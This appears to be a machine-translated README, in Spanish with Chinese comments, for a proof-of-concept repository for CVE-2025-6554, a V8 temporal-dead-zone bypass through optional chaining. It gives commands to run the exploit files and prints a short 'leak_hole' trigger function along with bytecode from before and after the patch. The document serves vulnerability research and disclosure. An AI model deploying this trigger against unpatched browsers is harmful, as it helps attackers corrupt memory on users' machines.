
CVE-2025-6554 PoC
⚠️ Proyecto de investigación de seguridad - Este proyecto se utiliza únicamente con fines de investigación y educación en seguridad. No lo utilice en entornos de producción.
CVE-2025-6554 es una vulnerabilidad grave en el motor V8 de Chrome que afecta al mecanismo de verificación de la Zona Muerta Temporal (TDZ) en JavaScript. Este proyecto proporciona el código completo de prueba de concepto de la vulnerabilidad y herramientas de demostración.
La vulnerabilidad existe en el motor V8 al procesar el operador de encadenamiento opcional (?.), ya que no verifica correctamente si la variable ha sido inicializada, lo que permite acceder a variables no declaradas y eludir el mecanismo de protección TDZ.
git clone https://github.com/9Insomnie/CVE-2025-6554.git
cd CVE-2025-6554
CVE-2025-6554/
├── Exploit.js # 原始漏洞利用代码
├── Test-Exploit.js # 测试版本
├── poc.html # 检测文件
├── README.md # 项目说明
└── 使用说明.md # 详细使用指南
# 使用V8的d8调试器运行
c:\path\to\v8\out\x64.debug\d8 --allow-natives-syntax --print-bytecode Exploit.js
# 运行测试版本
node Test-Exploit.js
# 或运行原始利用代码
node Exploit.js
Abra directamente el archivo HTML en el navegador para realizar la prueba (se requiere compatibilidad con las funciones pertinentes).
function leak_hole() {
let x;
delete x?.[y]?.a; // 使用未声明的变量y
return y; // 应该抛出ReferenceError
let y; // y在这里才声明
}
Antes del parche:
0x32600100133 @ 11 : b6 00 ThrowReferenceErrorIfHole [0]
Después del parche:
0x29f00100133 @ 11 : b6 00 ThrowReferenceErrorIfHole [0]
0x29f00100144 @ 28 : b6 00 ThrowReferenceErrorIfHole [0] // 新增检查
delete x?.[y]?.a# 检查漏洞是否存在
node Test-Exploit.js
# 查看详细字节码
d8 --allow-natives-syntax --print-bytecode Exploit.js
Esta vulnerabilidad fue descubierta por investigadores de seguridad y afecta al mecanismo de verificación TDZ del motor V8. Mediante el operador de encadenamiento opcional, un atacante puede eludir la verificación de inicialización de variables y obtener control sobre la memoria.
Este proyecto se distribuye bajo la licencia MIT - Consulte el archivo LICENSE para obtener más detalles.
⚠️ Descargo de responsabilidad: Este proyecto se utiliza únicamente con fines de investigación y educación en seguridad. El usuario asume todos los riesgos derivados de su uso; el autor no asume ninguna responsabilidad legal.
🔒 Informe de seguridad: Si encuentra nuevos problemas de seguridad, póngase en contacto a través de GitHub Issues.